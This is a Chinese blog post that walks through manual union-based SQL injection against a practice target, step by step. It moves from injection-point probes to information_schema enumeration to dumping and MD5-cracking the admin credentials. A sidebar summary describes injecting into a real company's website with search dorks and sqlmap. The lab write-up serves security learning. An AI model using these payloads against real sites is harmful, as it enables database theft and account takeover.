Server2003某网站sql注入

已于 2023-03-01 12:19:10 修改
阅读量263 收藏
点赞数 2
分类专栏: SQL注入危害 文章标签: sql Powered by 金山文档
于 2023-02-28 15:24:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70489261/article/details/129260356
版权

--鸡汤来咯~~~

今天的小目标是对这个靶场进行SQL注入测试

前言:

SQL注入漏洞的危害:

1、数据库中存储的用户隐私信息泄漏;

2、通过操作数据库对某些网页进行篡改;

3、修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;

4、数据库服务器被恶意操作,系统管理员帐户被窜改;

5、数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统;

6、破坏硬盘数据,导致全系统瘫痪;

注:这只是一个靶场只提供参考,勿要真实模拟。Server2003靶场链接,靶场密码(mt123456)

链接:https://pan.baidu.com/s/1EkjlobEbkDJUBZikarHMZg

提取码:jtll

一、测试注入点,老办法

1.单引号法:直接在网址后面加一个单引号,如果页面不能正常显示,浏览器返回一些异常信息,则说明该链接可能存在sql注入漏洞

2.1=1和1=2:在网址后面的get传参中加上 and 1=1 ,显示正常,把1=1替换为1=2,显示异常,说明网页存在sql注入

and 1=1,回显正常

and 1=2.这里发现1=2报错,这说明什么哇!有注入点哇!!

and 1=2#

二、利用联合查询union select来猜解判断字段位

and 1=2 union select 1,2,3,4,5#   

当union slecet 1,2,3,4,5,6#时页面显示错误,到这里我们就看出来此数据库有5个字段。

三、查询数据库版本及信息

既然找到了注入点那么到了这一步就可以利用联合查询看看数据库的版本。 mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容。

union select 1,version(),database(),4,5#

这里不仅发现了数据库的版本(5.1.35)是mysql5.0以上版本还发现了数据库名,爆出库名接下来干的事情就简单多了哇。

四、尝试爆表名

union select 1,table_name,3,4,5 from information_schema.tables where table_schema='govcn'

这里利用联合查询出了6个表名分别是:admin、index_dy、index_info、index_intro、jgsz、ldjj

遇见多个不熟悉的表不要慌,根据博主多年摸爬打滚的经验,重要的东西当然在admin表!!

接下来就可以爆admin表查看表里存在几个字段了。

五、查询表中字段

union select 1,column_name,3,4,5 from information_schema.columns where table_name='admin'

出来了出来了!爆出了username,password。

又看见熟悉的password了,这里就不需要思考了,直接查询password里的内容了。(当然会有些带坑的CTF题会恶心你一下把flag藏在username里面)

六、查询password字段内容

union select 1,unhex(hex(username)),unhex(hex(password)),4,5 from admin#

因为这里url会过滤敏感字符,所以这里我们用unhex和hex进行一次加密解密。

密码出来咯21232f297a57a5a743894a0e4a801fc3~~这里的密码发现是经过加密过的,我们可以用自己撰写的脚本工具或者根据判断出加密方式,对我来说当然是MD5加密咯。那么直接MD5解密。

七、MD5解码

得出了用户和密码:admin@admin

八、尝试登录后台

吃瓜吃瓜~~~~

我只希望逃之夭夭
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
WEB SQL漏洞-Access、MSSQLSQL server)注入
m0_61506558的博客
10-08 532
Access->表名->列名->数据,Access数据库保存在网站源码下面,和ASP项目共同存在,自己网站数据库独立存在,所以无法进行跨库,也没有文件读写的操作。
web安全-sql注入漏洞
weixin_61956136的博客
07-18 1561
web安全-sql注入漏洞
实验三:XSS和SQL注入
yghlqgt的博客
11-27 730
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
实验三 XSS和SQL注入
llsnb666的博客
12-22 138
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 0x01 XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色:
实战真实网站SQL注入
qq_55376995的博客
12-24 6391
某建设投资集团股份有限公司网站存在SQL注入一、发现过程1.使用百度语法寻找可能存在SQL注入网站:inurl:?id=12.发现一个网站进去看看3.尝试手工注入:?id=1106'?id=1106-1?id=1106-24.发现页面发生变化,可能存在SQL注入二、漏洞利用1.这里使用sqlmap进行注入检测表:​检测字段:检测数据:4.然后跑出用户名和密码,但密码是加密过的,我用MD5解密最后得出。
云安全技术——云端应用SQL注入攻击
weixin_43361166的博客
03-06 5548
实验目的】 1.掌握SQL注入的原理与基本注入步骤 2.掌握Kali Linux中的SQLmap各类功能及参数配置 【实验要求】 1.使用啊D工具进行网络攻击; 2.利用SQLmap对目标站点进行渗透攻击; 【实验环境】 1.Windows Server 2008环境下的啊D工具; 2.搭建SQL注入漏洞的web网站,该站点后台数据库为ACCESS 2003,且与啊D工具在同一虚拟机中; 3.搭建好测试网站DVWA; 4.正常连接互联网并且两台虚拟机那个ping 通; 项目四 云端应用SQL注入攻击 任务
sql注入网站源码
04-09
这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这类漏洞非常有价值。ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。 在ASP中,...
三步堵死 SQL Server注入漏洞
09-11
三步堵死 SQL Server 注入漏洞 SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,...
Sql serversql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
【Web漏洞探索】SQL注入漏洞
kjcxmx的博客
07-22 1883
SQL注入SQLi)是一种网络安全漏洞,允许攻击者干扰应用程序对其数据库的查询。通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,而网站应用程序未对其进行过滤,SQL语句带入数据库使恶意SQL语句得以执行可以查看通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生持续变化。在某些情况下,攻击者可以升级SQL注入攻击以破坏底层服务器或其他后端基础架构或执行拒绝服务攻击。...
【实训04】数据库SQL注入漏洞
一只鼠标的博客
10-17 1408
LAMP:LAMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写。L:Linux,操作系统A:Apache网页服务器M:MySQL,数据库管理软件P:PHP,脚本语言DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。password,将其写入。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 专题一
cao919的专栏Net
07-13 698
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 759
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 307
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 570
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
SQL面试题-留存率计算
xiao4816的博客
07-07 417
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
最新发布
hackeroink的博客
07-15 541
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 219
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
c#拼接SQLserversql 防止sql注入
05-23
在 C# 中拼接 SQL ServerSQL 语句时,为了防止 SQL 注入攻击,应该使用参数化查询。 参数化查询是一种将查询参数与 SQL 查询语句分开的技术。这样可以避免 SQL 注入攻击,因为查询参数不会被解释为 SQL 代码。 下面是一个使用参数化查询的示例代码: ```csharp using (SqlConnection connection = new SqlConnection(connectionString)) { string sql = "SELECT * FROM Users WHERE Username = @Username AND Password = @Password"; using (SqlCommand command = new SqlCommand(sql, connection)) { command.Parameters.AddWithValue("@Username", username); command.Parameters.AddWithValue("@Password", password); connection.Open(); SqlDataReader reader = command.ExecuteReader(); // 处理查询结果 } } ``` 在上面的代码中,我们使用 @Username 和 @Password 作为占位符来代替输入的用户名和密码。然后,使用 `AddWithValue` 方法将输入的用户名和密码作为参数添加到 `SqlCommand` 对象中。最后,执行查询并处理结果。 使用参数化查询可以确保输入的数据不会被解释为 SQL 代码,从而避免 SQL 注入攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我只希望逃之夭夭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值